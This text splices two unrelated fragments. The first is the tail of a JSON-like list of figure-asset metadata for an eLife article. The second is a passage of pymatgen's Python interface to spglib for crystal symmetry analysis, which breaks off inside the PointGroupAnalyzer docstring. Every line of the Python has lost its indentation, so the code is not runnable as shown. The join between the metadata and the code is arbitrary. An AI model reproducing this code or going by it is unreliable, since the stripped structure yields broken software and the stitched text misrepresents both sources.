"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.009",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 5,
"ordinal": 5,
},
{
"xlink_href": "elife00013fs003",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 6,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 3,
"parent_component_doi": "10.7554/eLife.00013.010",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 6,
"ordinal": 6,
},
{
"xlink_href": "elife00013fs004",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 7,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 4,
"parent_component_doi": "10.7554/eLife.00013.011",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 7,
"ordinal": 7,
},
{
"xlink_href": "elife00013fs005",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 8,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 5,
"parent_component_doi": "10.7554/eLife.00013.012",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 8,
"ordinal": 8,
},
{
"xlink_href": "elife00013fs006",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 9,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 6,
"parent_component_doi": "10.7554/eLife.00013.013",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 9,
"ordinal": 9,
},
{
"xlink_href": "elife00013fs007",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 10,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 7,
"parent_component_doi": "10.7554/eLife.00013.014",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 10,
"ordinal": 10,
},
{
"xlink_href": "elife00013fs008",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 11,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 8,
"parent_component_doi": "10.7554/eLife.00013.015",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 11,
"ordinal": 11,
},
{
"xlink_href": "elife00013fs009",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 12,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 9,
"parent_component_doi": "10.7554/eLife.00013.016",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 12,
"ordinal": 12,
},
{
"xlink_href": "elife00013fs010",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 13,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 10,
"parent_component_doi": "10.7554/eLife.00013.017",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 13,
"ordinal": 13,
},
{
"xlink_href": "elife00013fs011",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 14,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 11,
"parent_component_doi": "10.7554/eLife.00013.018",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 14,
"ordinal": 14,
},
{
"xlink_href": "elife00013fs012",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 15,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 12,
"parent_component_doi": "10.7554/eLife.00013.019",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 15,
"ordinal": 15,
},
{
"xlink_href": "elife00013fs013",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 16,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 13,
"parent_component_doi": "10.7554/eLife.00013.020",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 16,
"ordinal": 16,
},
{
"xlink_href": "elife00013fs014",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 17,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 14,
"parent_component_doi": "10.7554/eLife.00013.021",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 17,
"ordinal": 17,
},
{
"xlink_href": "elife00013fs015",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 18,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 15,
"parent_component_doi": "10.7554/eLife.00013.022",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 18,
"ordinal": 18,
},
{
"xlink_href": "elife00013fs016",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 19,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 16,
"parent_component_doi": "10.7554/eLife.00013.023",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 19,
"ordinal": 19,
},
{
"xlink_href": "elife00013f004",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 20,
"parent_sibling_ordinal": 4,
"parent_component_doi": "10.7554/eLife.00013.025",
"position": 20,
"ordinal": 20,
},
{
"xlink_href": "elife00013fs017",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 21,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.026",
"p_parent_type": "fig",
"p_parent_ordinal": 20,
"p_parent_sibling_ordinal": 4,
"p_parent_component_doi": "10.7554/eLife.00013.025",
"position": 21,
"ordinal": 21,
},
{
"xlink_href": "elife00013fs018",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 22,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 3,
"parent_component_doi": "10.7554/eLife.00013.027",
"p_parent_type": "fig",
"p_parent_ordinal": 20,
"p_parent_sibling_ordinal": 4,
"p_parent_component_doi": "10.7554/eLife.00013.025",
"position": 22,
"ordinal": 22,
},
{
"xlink_href": "elife00013fs019",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 23,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 4,
"parent_component_doi": "10.7554/eLife.00013.028",
"p_parent_type": "fig",
"p_parent_ordinal": 20,
"p_parent_sibling_ordinal": 4,
"p_parent_component_doi": "10.7554/eLife.00013.025",
"position": 23,
"ordinal": 23,
},
]
|
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals, print_function
import itertools
import logging
from collections import defaultdict
import math
from math import cos
from math import sin
from fractions import Fraction
import numpy as np
from six.moves import filter, map, zip
from monty.dev import deprecated
import spglib
from pymatgen.core.structure import Structure
from pymatgen.symmetry.structure import SymmetrizedStructure
from pymatgen.core.lattice import Lattice
from pymatgen.core.structure import PeriodicSite
from pymatgen.core.operations import SymmOp
from pymatgen.util.coord_utils import find_in_coord_list, pbc_diff
"""
An interface to the excellent spglib library by Atsushi Togo
(http://spglib.sourceforge.net/) for pymatgen.
v1.0 - Now works with both ordered and disordered structures.
v2.0 - Updated for spglib 1.6.
v3.0 - pymatgen no longer ships with spglib. Instead, spglib (the python
version) is now a dependency and the SpacegroupAnalyzer merely serves
as an interface to spglib for pymatgen Structures.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "3.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "May 14, 2016"
logger = logging.getLogger(__name__)
class SpacegroupAnalyzer(object):
"""
Takes a pymatgen.core.structure.Structure object and a symprec.
Uses spglib to perform various symmetry finding operations.
Args:
structure (Structure/IStructure): Structure to find symmetry
symprec (float): Tolerance for symmetry finding. Defaults to 1e-3,
which is fairly strict and works well for properly refined
structures with atoms in the proper symmetry coordinates. For
structures with slight deviations from their proper atomic
positions (e.g., structures relaxed with electronic structure
codes), a looser tolerance of 0.1 (the value used in Materials
Project) is often needed.
angle_tolerance (float): Angle tolerance for symmetry finding.
"""
def __init__(self, structure, symprec=1e-3, angle_tolerance=5):
self._symprec = symprec
self._angle_tol = angle_tolerance
self._structure = structure
latt = structure.lattice.matrix
positions = structure.frac_coords
unique_species = []
zs = []
magmoms = []
for species, g in itertools.groupby(structure,
key=lambda s: s.species_and_occu):
if species in unique_species:
ind = unique_species.index(species)
zs.extend([ind + 1] * len(tuple(g)))
else:
unique_species.append(species)
zs.extend([len(unique_species)] * len(tuple(g)))
for site in structure:
if hasattr(site, 'magmom'):
magmoms.append(site.magmom)
elif site.is_ordered and hasattr(site.specie, 'spin'):
magmoms.append(site.specie.spin)
else:
magmoms.append(0)
self._unique_species = unique_species
self._numbers = zs
# Magmoms collected above (site property or species spin, else 0).
self._cell = latt, positions, zs, magmoms
self._space_group_data = spglib.get_symmetry_dataset(
self._cell, symprec=self._symprec, angle_tolerance=angle_tolerance)
@deprecated(message="get_spacegroup has been renamed "
"get_space_group_operations. Will be removed in "
"pymatgen 2018.01.01.")
def get_spacegroup(self):
"""
Get the SpacegroupOperations for the Structure.
Returns:
SpacegroupOperations object.
"""
return self.get_space_group_operations()
@deprecated(message="get_spacegroup_symbol has been renamed "
"get_space_group_symbol. Will be removed in "
"pymatgen 2018.01.01.")
def get_spacegroup_symbol(self):
"""
Get the spacegroup symbol (e.g., Pnma) for structure.
Returns:
(str): Spacegroup symbol for structure.
"""
return self._space_group_data["international"]
@deprecated(message="get_spacegroup_number has been renamed "
"get_space_group_number. Will be removed in "
"pymatgen 2018.01.01.")
def get_spacegroup_number(self):
"""
Get the international spacegroup number (e.g., 62) for structure.
Returns:
(int): International spacegroup number for structure.
"""
return int(self._space_group_data["number"])
def get_space_group_operations(self):
"""
Get the SpacegroupOperations for the Structure.
Returns:
SpacegroupOperations object.
"""
return SpacegroupOperations(self.get_space_group_symbol(),
self.get_space_group_number(),
self.get_symmetry_operations())
def get_space_group_symbol(self):
"""
Get the spacegroup symbol (e.g., Pnma) for structure.
Returns:
(str): Spacegroup symbol for structure.
"""
return self._space_group_data["international"]
def get_space_group_number(self):
"""
Get the international spacegroup number (e.g., 62) for structure.
Returns:
(int): International spacegroup number for structure.
"""
return int(self._space_group_data["number"])
def get_hall(self):
"""
Returns Hall symbol for structure.
Returns:
(str): Hall symbol
"""
return self._space_group_data["hall"]
@deprecated(message="get_point_group has been renamed "
"get_point_group_symbol. Will be removed in "
"pymatgen 2018.01.01.")
def get_point_group(self):
return self.get_point_group_symbol()
def get_point_group_symbol(self):
"""
Get the point group associated with the structure.
Returns:
(Pointgroup): Point group for structure.
"""
rotations = self._space_group_data["rotations"]
# passing a 0-length rotations list to spglib can segfault
if len(rotations) == 0:
return '1'
return spglib.get_pointgroup(rotations)[0].strip()
def get_crystal_system(self):
"""
Get the crystal system for the structure, e.g., (triclinic,
orthorhombic, cubic, etc.).
Returns:
(str): Crystal system for structure.
"""
n = self._space_group_data["number"]
f = lambda i, j: i <= n <= j
cs = {"triclinic": (1, 2), "monoclinic": (3, 15),
"orthorhombic": (16, 74), "tetragonal": (75, 142),
"trigonal": (143, 167), "hexagonal": (168, 194),
"cubic": (195, 230)}
crystal_system = None
for k, v in cs.items():
if f(*v):
crystal_system = k
break
return crystal_system
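# Hedged worked example: space group 62 (Pnma) satisfies 16 <= 62 <= 74,
# so get_crystal_system() reports "orthorhombic" for such a structure.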
def get_lattice_type(self):
"""
Get the lattice type for the structure, e.g., (triclinic,
orthorhombic, cubic, etc.). This is the same as the crystal
system, except for the hexagonal/rhombohedral lattices.
Returns:
(str): Lattice type for structure.
"""
n = self._space_group_data["number"]
system = self.get_crystal_system()
if n in [146, 148, 155, 160, 161, 166, 167]:
return "rhombohedral"
elif system == "trigonal":
return "hexagonal"
else:
return system
def get_symmetry_dataset(self):
"""
Returns the symmetry dataset as a dict.
Returns:
(dict): With the following properties:
number: International space group number
international: International symbol
hall: Hall symbol
transformation_matrix: Transformation matrix from lattice of
input cell to Bravais lattice L^bravais = L^original * Tmat
origin shift: Origin shift in the setting of "Bravais lattice"
rotations, translations: Rotation matrices and translation
vectors. Space group operations are obtained by
[(r,t) for r, t in zip(rotations, translations)]
wyckoffs: Wyckoff letters
"""
return self._space_group_data
def _get_symmetry(self):
"""
Get the symmetry operations associated with the structure.
Returns:
Symmetry operations as a tuple of two equal length sequences.
(rotations, translations). "rotations" is the numpy integer array
of the rotation matrices for scaled positions
"translations" gives the numpy float64 array of the translation
vectors in scaled positions.
"""
d = spglib.get_symmetry(self._cell, symprec=self._symprec,
angle_tolerance=self._angle_tol)
# Sometimes spglib returns small translation vectors, e.g.
# [1e-4, 2e-4, 1e-4]
# (these are in fractional coordinates, so should be small denominator
# fractions)
trans = []
for t in d["translations"]:
trans.append([float(Fraction.from_float(c).limit_denominator(1000))
for c in t])
trans = np.array(trans)
# fractional translations of 1 are more simply 0
trans[np.abs(trans) == 1] = 0
return d["rotations"], trans
def get_symmetry_operations(self, cartesian=False):
"""
Return symmetry operations as a list of SymmOp objects.
By default returns fractional coord symmops.
But cartesian can be returned too.
Returns:
([SymmOp]): List of symmetry operations.
"""
rotation, translation = self._get_symmetry()
symmops = []
mat = self._structure.lattice.matrix.T
invmat = np.linalg.inv(mat)
for rot, trans in zip(rotation, translation):
if cartesian:
rot = np.dot(mat, np.dot(rot, invmat))
trans = np.dot(trans, self._structure.lattice.matrix)
op = SymmOp.from_rotation_and_translation(rot, trans)
symmops.append(op)
return symmops
def get_point_group_operations(self, cartesian=False):
"""
Return symmetry operations as a list of SymmOp objects.
By default returns fractional coord symmops.
But cartesian can be returned too.
Args:
cartesian (bool): Whether to return SymmOps as cartesian or
direct coordinate operations.
Returns:
([SymmOp]): List of point group symmetry operations.
"""
rotation, translation = self._get_symmetry()
symmops = []
mat = self._structure.lattice.matrix.T
invmat = np.linalg.inv(mat)
for rot in rotation:
if cartesian:
rot = np.dot(mat, np.dot(rot, invmat))
op = SymmOp.from_rotation_and_translation(rot, np.array([0, 0, 0]))
symmops.append(op)
return symmops
def get_symmetrized_structure(self):
"""
Get a symmetrized structure. A symmetrized structure is one where the
sites have been grouped into symmetrically equivalent groups.
Returns:
:class:`pymatgen.symmetry.structure.SymmetrizedStructure` object.
"""
ds = self.get_symmetry_dataset()
sg = SpacegroupOperations(self.get_space_group_symbol(),
self.get_space_group_number(),
self.get_symmetry_operations())
return SymmetrizedStructure(self._structure, sg,
ds["equivalent_atoms"],
ds["wyckoffs"])
def get_refined_structure(self):
"""
Get the refined structure based on detected symmetry. The refined
structure is a *conventional* cell setting with atoms moved to the
expected symmetry positions.
Returns:
Refined structure.
"""
# Atomic positions have to be specified by scaled positions for spglib.
lattice, scaled_positions, numbers \
= spglib.refine_cell(self._cell, self._symprec, self._angle_tol)
species = [self._unique_species[i - 1] for i in numbers]
s = Structure(lattice, species, scaled_positions)
return s.get_sorted_structure()
def find_primitive(self):
"""
Find a primitive version of the unit cell.
Returns:
A primitive cell in the input cell is searched and returned
as an Structure object. If no primitive cell is found, None is
returned.
"""
lattice, scaled_positions, numbers = spglib.find_primitive(
self._cell, symprec=self._symprec)
species = [self._unique_species[i - 1] for i in numbers]
return Structure(lattice, species, scaled_positions,
to_unit_cell=True).get_reduced_structure()
def get_ir_reciprocal_mesh(self, mesh=(10, 10, 10), is_shift=(0, 0, 0)):
"""
k-point mesh of the Brillouin zone generated taking symmetry into
account. The method returns the irreducible kpoints of the mesh
and their weights.
Args:
mesh (3x1 array): The number of kpoints for the mesh needed in
each direction
is_shift (3x1 array): Whether to shift the kpoint grid. (1, 1,
1) means all points are shifted by 0.5, 0.5, 0.5.
Returns:
A list of irreducible kpoints and their weights as a list of
tuples [(ir_kpoint, weight)], with ir_kpoint given
in fractional coordinates
"""
shift = np.array([1 if i else 0 for i in is_shift])
mapping, grid = spglib.get_ir_reciprocal_mesh(
np.array(mesh), self._cell, is_shift=shift, symprec=self._symprec)
results = []
tmp_map = list(mapping)
for i in np.unique(mapping):
results.append(((grid[i] + shift * (0.5, 0.5, 0.5)) / mesh,
tmp_map.count(i)))
return results
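# Hedged example: for mesh=(4, 4, 4) the returned weights count how many of
# the 64 grid points map onto each irreducible kpoint, so the weights sum to
# 4 * 4 * 4 = 64; the Gamma point typically appears as (array([0., 0., 0.]), 1).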
def get_primitive_standard_structure(self, international_monoclinic=True):
"""
Gives a structure with a primitive cell according to certain standards.
The standards are defined in Setyawan, W., & Curtarolo, S. (2010).
High-throughput electronic band structure calculations:
Challenges and tools. Computational Materials Science,
49(2), 299-312. doi:10.1016/j.commatsci.2010.05.010
Returns:
The structure in a primitive standardized cell
"""
conv = self.get_conventional_standard_structure(
international_monoclinic=international_monoclinic)
lattice = self.get_lattice_type()
if "P" in self.get_space_group_symbol() or lattice == "hexagonal":
return conv
if lattice == "rhombohedral":
# check if the conventional representation is hexagonal or
# rhombohedral
lengths, angles = conv.lattice.lengths_and_angles
if abs(lengths[0]-lengths[2]) < 0.0001:
transf = np.eye(3)
else:
transf = np.array([[-1, 1, 1], [2, 1, 1], [-1, -2, 1]],
dtype=np.float) / 3
elif "I" in self.get_space_group_symbol():
transf = np.array([[-1, 1, 1], [1, -1, 1], [1, 1, -1]],
dtype=np.float) / 2
elif "F" in self.get_space_group_symbol():
transf = np.array([[0, 1, 1], [1, 0, 1], [1, 1, 0]],
dtype=np.float) / 2
elif "C" in self.get_space_group_symbol():
if self.get_crystal_system() == "monoclinic":
transf = np.array([[1, 1, 0], [-1, 1, 0], [0, 0, 2]],
dtype=np.float) / 2
else:
transf = np.array([[1, -1, 0], [1, 1, 0], [0, 0, 2]],
dtype=np.float) / 2
else:
transf = np.eye(3)
new_sites = []
latt = Lattice(np.dot(transf, conv.lattice.matrix))
for s in conv:
new_s = PeriodicSite(
s.specie, s.coords, latt,
to_unit_cell=True, coords_are_cartesian=True,
properties=s.properties)
if not any(map(new_s.is_periodic_image, new_sites)):
new_sites.append(new_s)
if lattice == "rhombohedral":
prim = Structure.from_sites(new_sites)
lengths, angles = prim.lattice.lengths_and_angles
a = lengths[0]
alpha = math.pi * angles[0] / 180
new_matrix = [
[a * cos(alpha / 2), -a * sin(alpha / 2), 0],
[a * cos(alpha / 2), a * sin(alpha / 2), 0],
[a * cos(alpha) / cos(alpha / 2), 0,
a * math.sqrt(1 - (cos(alpha) ** 2 / (cos(alpha / 2) ** 2)))]]
new_sites = []
latt = Lattice(new_matrix)
for s in prim:
new_s = PeriodicSite(
s.specie, s.frac_coords, latt,
to_unit_cell=True, properties=s.properties)
if not any(map(new_s.is_periodic_image, new_sites)):
new_sites.append(new_s)
return Structure.from_sites(new_sites)
return Structure.from_sites(new_sites)
def get_conventional_standard_structure(
self, international_monoclinic=True):
"""
Gives a structure with a conventional cell according to certain
standards. The standards are defined in Setyawan, W., & Curtarolo,
S. (2010). High-throughput electronic band structure calculations:
Challenges and tools. Computational Materials Science,
49(2), 299-312. doi:10.1016/j.commatsci.2010.05.010
They basically enforce as much as possible
norm(a1)<norm(a2)<norm(a3)
Returns:
The structure in a conventional standardized cell
"""
tol = 1e-5
struct = self.get_refined_structure()
latt = struct.lattice
latt_type = self.get_lattice_type()
sorted_lengths = sorted(latt.abc)
sorted_dic = sorted([{'vec': latt.matrix[i],
'length': latt.abc[i],
'orig_index': i} for i in [0, 1, 2]],
key=lambda k: k['length'])
if latt_type in ("orthorhombic", "cubic"):
# you want to keep the c axis where it is
# to keep the C- settings
transf = np.zeros(shape=(3, 3))
if self.get_space_group_symbol().startswith("C"):
transf[2] = [0, 0, 1]
a, b = sorted(latt.abc[:2])
sorted_dic = sorted([{'vec': latt.matrix[i],
'length': latt.abc[i],
'orig_index': i} for i in [0, 1]],
key=lambda k: k['length'])
for i in range(2):
transf[i][sorted_dic[i]['orig_index']] = 1
c = latt.abc[2]
else:
for i in range(len(sorted_dic)):
transf[i][sorted_dic[i]['orig_index']] = 1
a, b, c = sorted_lengths
latt = Lattice.orthorhombic(a, b, c)
elif latt_type == "tetragonal":
# find the "a" vectors
# it is basically the vector repeated two times
transf = np.zeros(shape=(3, 3))
a, b, c = sorted_lengths
for d in range(len(sorted_dic)):
transf[d][sorted_dic[d]['orig_index']] = 1
if abs(b - c) < tol:
a, c = c, a
transf = np.dot([[0, 0, 1], [0, 1, 0], [1, 0, 0]], transf)
latt = Lattice.tetragonal(a, c)
elif latt_type in ("hexagonal", "rhombohedral"):
# for the conventional cell representation,
# we always show the rhombohedral lattices as hexagonal
# first check whether the refined structure shows a rhombohedral
# cell; if so, make a supercell
a, b, c = latt.abc
if np.all(np.abs([a - b, c - b, a - c]) < 0.001):
struct.make_supercell(((1, -1, 0), (0, 1, -1), (1, 1, 1)))
a, b, c = sorted(struct.lattice.abc)
if abs(b - c) < 0.001:
a, c = c, a
new_matrix = [[a / 2, -a * math.sqrt(3) / 2, 0],
[a / 2, a * math.sqrt(3) / 2, 0],
[0, 0, c]]
latt = Lattice(new_matrix)
transf = np.eye(3, 3)
elif latt_type == "monoclinic":
# You want to keep the c axis where it is to keep the C- settings
if self.get_space_group_operations().int_symbol.startswith("C"):
transf = np.zeros(shape=(3, 3))
transf[2] = [0, 0, 1]
sorted_dic = sorted([{'vec': latt.matrix[i],
'length': latt.abc[i],
'orig_index': i} for i in [0, 1]],
key=lambda k: k['length'])
a = sorted_dic[0]['length']
b = sorted_dic[1]['length']
c = latt.abc[2]
new_matrix = None
for t in itertools.permutations(list(range(2)), 2):
m = latt.matrix
landang = Lattice(
[m[t[0]], m[t[1]], m[2]]).lengths_and_angles
if landang[1][0] > 90:
# if the angle is > 90 we invert a and b to get
# an angle < 90
landang = Lattice(
[-m[t[0]], -m[t[1]], m[2]]).lengths_and_angles
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = -1
transf[1][t[1]] = -1
transf[2][2] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
continue
elif landang[1][0] < 90:
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = 1
transf[1][t[1]] = 1
transf[2][2] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
if new_matrix is None:
# this treats the case where alpha == 90
# (but we still have a monoclinic space group)
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, 0, c]]
transf = np.zeros(shape=(3, 3))
for c in range(len(sorted_dic)):
transf[c][sorted_dic[c]['orig_index']] = 1
# if not C-setting
else:
# try all permutations of the axis
# keep the ones with the non-90 angle=alpha
# and b<c
new_matrix = None
for t in itertools.permutations(list(range(3)), 3):
m = latt.matrix
landang = Lattice(
[m[t[0]], m[t[1]], m[t[2]]]).lengths_and_angles
if landang[1][0] > 90 and landang[0][1] < landang[0][2]:
landang = Lattice(
[-m[t[0]], -m[t[1]], m[t[2]]]).lengths_and_angles
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = -1
transf[1][t[1]] = -1
transf[2][t[2]] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
continue
elif landang[1][0] < 90 and landang[0][1] < landang[0][2]:
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = 1
transf[1][t[1]] = 1
transf[2][t[2]] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
if new_matrix is None:
# this treats the case where alpha == 90
# (but we still have a monoclinic space group)
new_matrix = [[sorted_lengths[0], 0, 0],
[0, sorted_lengths[1], 0],
[0, 0, sorted_lengths[2]]]
transf = np.zeros(shape=(3, 3))
for c in range(len(sorted_dic)):
transf[c][sorted_dic[c]['orig_index']] = 1
if international_monoclinic:
# The above code makes alpha the non-right angle.
# The following will convert to proper international convention
# that beta is the non-right angle.
op = [[0, 1, 0], [1, 0, 0], [0, 0, -1]]
transf = np.dot(op, transf)
new_matrix = np.dot(op, new_matrix)
beta = Lattice(new_matrix).beta
if beta < 90:
op = [[-1, 0, 0], [0, -1, 0], [0, 0, 1]]
transf = np.dot(op, transf)
new_matrix = np.dot(op, new_matrix)
latt = Lattice(new_matrix)
elif latt_type == "triclinic":
# we use an LLL Minkowski-like reduction for the triclinic cells
struct = struct.get_reduced_structure("LLL")
a, b, c = latt.lengths_and_angles[0]
alpha, beta, gamma = [math.pi * i / 180
for i in latt.lengths_and_angles[1]]
new_matrix = None
test_matrix = [[a, 0, 0],
[b * cos(gamma), b * sin(gamma), 0.0],
[c * cos(beta),
c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
def is_all_acute_or_obtuse(m):
recp_angles = np.array(Lattice(m).reciprocal_lattice.angles)
return np.all(recp_angles <= 90) or np.all(recp_angles > 90)
if is_all_acute_or_obtuse(test_matrix):
transf = np.eye(3)
new_matrix = test_matrix
test_matrix = [[-a, 0, 0],
[b * cos(gamma), b * sin(gamma), 0.0],
[-c * cos(beta),
-c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
-c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
if is_all_acute_or_obtuse(test_matrix):
transf = [[-1, 0, 0],
[0, 1, 0],
[0, 0, -1]]
new_matrix = test_matrix
test_matrix = [[-a, 0, 0],
[-b * cos(gamma), -b * sin(gamma), 0.0],
[c * cos(beta),
c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
if is_all_acute_or_obtuse(test_matrix):
transf = [[-1, 0, 0],
[0, -1, 0],
[0, 0, 1]]
new_matrix = test_matrix
test_matrix = [[a, 0, 0],
[-b * cos(gamma), -b * sin(gamma), 0.0],
[-c * cos(beta),
-c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
-c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
if is_all_acute_or_obtuse(test_matrix):
transf = [[1, 0, 0],
[0, -1, 0],
[0, 0, -1]]
new_matrix = test_matrix
latt = Lattice(new_matrix)
new_coords = np.dot(transf, np.transpose(struct.frac_coords)).T
new_struct = Structure(latt, struct.species_and_occu, new_coords,
site_properties=struct.site_properties,
to_unit_cell=True)
return new_struct.get_sorted_structure()
def get_kpoint_weights(self, kpoints, atol=1e-5):
"""
Calculate the weights for a list of kpoints.
Args:
kpoints (Sequence): Sequence of kpoints. np.arrays are fine. Note
that the code does not check that the list of kpoints
provided does not contain duplicates.
atol (float): Tolerance for fractional coordinates comparisons.
Returns:
List of weights, in the SAME order as kpoints.
"""
kpts = np.array(kpoints)
shift = []
mesh = []
for i in range(3):
nonzero = [k for k in kpts[:, i] if abs(k) > 1e-5]
if len(nonzero) != len(kpts):
# gamma centered
if not nonzero:
mesh.append(1)
else:
m = np.abs(np.round(1/np.array(nonzero)))
mesh.append(int(max(m)))
shift.append(0)
else:
# Monk
m = np.abs(np.round(0.5/np.array(nonzero)))
mesh.append(int(max(m)))
shift.append(1)
mapping, grid = spglib.get_ir_reciprocal_mesh(
np.array(mesh), self._cell, is_shift=shift, symprec=self._symprec)
mapping = list(mapping)
grid = (np.array(grid) + np.array(shift) * (0.5, 0.5, 0.5)) / mesh
weights = []
mapped = defaultdict(int)
for k in kpoints:
for i, g in enumerate(grid):
if np.allclose(pbc_diff(k, g), (0, 0, 0), atol=atol):
mapped[tuple(g)] += 1
weights.append(mapping.count(mapping[i]))
break
if (len(mapped) != len(set(mapping))) or (
not all([v == 1 for v in mapped.values()])):
raise ValueError("Unable to find 1:1 corresponding between input "
"kpoints and irreducible grid!")
return [w/sum(weights) for w in weights]
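# Hedged example: feeding back the irreducible kpoints from
# get_ir_reciprocal_mesh (the first element of each returned tuple) yields
# normalized weights that sum to 1, in the same order as the input list.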
class PointGroupAnalyzer(object):
"""
A class to analyze the point group of a molecule. The general outline of
the algorithm is as follows:
1. Center the molecule around its center of mass.
2. Compute the inertia tensor and the eigenvalues and eigenvectors.
3. Handle the symmetry detection based on eigenvalues.
a. Linear molecules have one zero eigenvalue. Possible symmetry
operations are C*v or D*h.
b. Asymmetric top molecules have all different eigenvalues. The
maximum rotational symmetry in such molecules is 2.
